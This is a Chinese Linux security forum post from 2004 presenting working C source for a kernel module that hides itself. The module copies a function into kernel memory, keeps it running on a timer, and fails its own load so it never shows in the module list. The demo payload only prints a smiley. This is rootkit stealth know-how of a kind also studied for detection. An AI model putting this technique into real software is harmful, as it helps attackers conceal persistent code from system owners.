Linux 高级应用    >> 系统和网络安全 此话题阅读次数: 6253 平坦模式  树状模式

打印

teawater (Pooh-Bah) 04-07-04 15:25 [精华] [原创]另外一种隐藏LKM的方法 ：）   //gcc -I /usr/src/linux-2.4/include -c 1.c #define MODULE #define __KERNEL__ #define LINUX #include <linux/kernel.h> #include <linux/module.h> #include <linux/version.h> #include <linux/types.h> #include <linux/errno.h> #include <linux/mm.h> #include <linux/smp_lock.h> #include <asm/uaccess.h> #include <linux/timer.h> #ifndef list_for_each_safe #define list_for_each_safe(pos, n, head) \ for (pos = (head)->next, n = pos->next; pos != (head); \ pos = n, n = pos->next) #endif struct ghost_struct { struct timer_list tl; char buf[32]; int (*printk)(const char *fmt, ...); void (*add_timer)(struct timer_list *timer) }; void ghost(unsigned long ptr) { struct ghost_struct *gs=(struct ghost_struct*)ptr; gs->printk(gs->buf); gs->tl.expires=jiffies+3*HZ; gs->add_timer(&gs->tl); } int init_module(void) { struct ghost_struct *gs; gs=(struct ghost_struct *)kmalloc((unsigned long)init_module-(unsigned long)ghost+sizeof(struct ghost_struct),GFP_KERNEL); if (!gs) { printk(KERN_EMERG"kmalloc error!\n"); return(-1); } memcpy((char *)gs+sizeof(struct ghost_struct),(char *)ghost,(unsigned long)init_module-(unsigned long)ghost); init_timer(&gs->tl); snprintf(gs->buf,32,KERN_EMERG":)\n"); gs->printk=printk; gs->tl.function=(char *)gs+sizeof(struct ghost_struct); gs->tl.data=(unsigned long)gs; gs->tl.expires=jiffies+3*HZ; gs->add_timer=add_timer; add_timer(&gs->tl); return(-1); } MODULE_LICENSE("GPL"); /* redhat 9.0 kernel 2.4.20-8 下测试可用 将一块函数拷贝进分配好的一块内存，然后挂到合适的地方，然后到时候就可被执行。 其中比较麻烦的地方是，因为在函数中使用相对寻址的地方很多，在拷贝进新地址后调用自然会出 问题，所以在我这里把相对地址的几个东西都放进了结构里了，这个东西应该是还有别的办法解决 ，比如把elf文件弄进个buf，然后象2.6那样在kernel中进行连接。 */ -------------------- 夕阳芳草见游猪 编辑者： madsys (04-07-05 14:31) 文章选项：

整个主题 文章标题 张贴者： 张贴日期 [精华] [原创]另外一种隐藏LKM的方法 ：） teawater   04-07-04 15:25 Re: [原创]另外一种隐藏LKM的方法 ：） grip2   04-07-06 10:42 Re: [原创]另外一种隐藏LKM的方法 ：） teawater   04-07-06 11:02 Re: [原创]另外一种隐藏LKM的方法 ：） madsys   04-07-05 14:42 [精华] Re: [原创]另外一种隐藏LKM的方法 ：） madsys   04-07-05 14:39 Re: [原创]另外一种隐藏LKM的方法 ：） grip2   04-07-06 10:38 Re: [原创]另外一种隐藏LKM的方法 ：） teawater   04-07-06 10:48 Re: [原创]另外一种隐藏LKM的方法 ：） coolq   04-07-06 01:12

前往讨论区 *Linux 社区和文化* -----   社区公告栏   社区服务台   业界新闻与评论   自由软件杂谈   爱心版   Linux软件快递   翻译作坊   Linux图书与评论   招聘和求职*Linux 桌面与办公自动化* -----   GNU Emacs/XEmacs   Linux 中文环境和中文化   Linux桌面与办公软件   Linux 多媒体与娱乐版   自由之窗Mozilla    笔记本电脑上的Linux*Linux 入门及网络应用* -----   Gentoo    Debian 一族   网络管理技术   Linux 安装与入门   WEB服务器和FTP服务器   域名服务器和邮件服务器   Linux防火墙和代理服务器应用   文件及打印服务器    技术培训与认证*Linux 高级应用* -----   TI专版   Linux内核技术   Linux 嵌入技术   Linux设备驱动程序    Linux 集群技术   LINUX平台数据库   系统和网络安全   CPU 与 编译器   系统计算研究所专栏*Linux 环境下的程序设计* -----   Linux下的GUI软件开发   C/C++编程版   PHP 技 术   Java&jsp技术   Shell编程技术   Perl 编 程   Python 编 程   XML/Web Service 技术*永远的 UNIX* -----   永远的Unix   FreeBSD世界

Contact Us LINUXFORUM.NET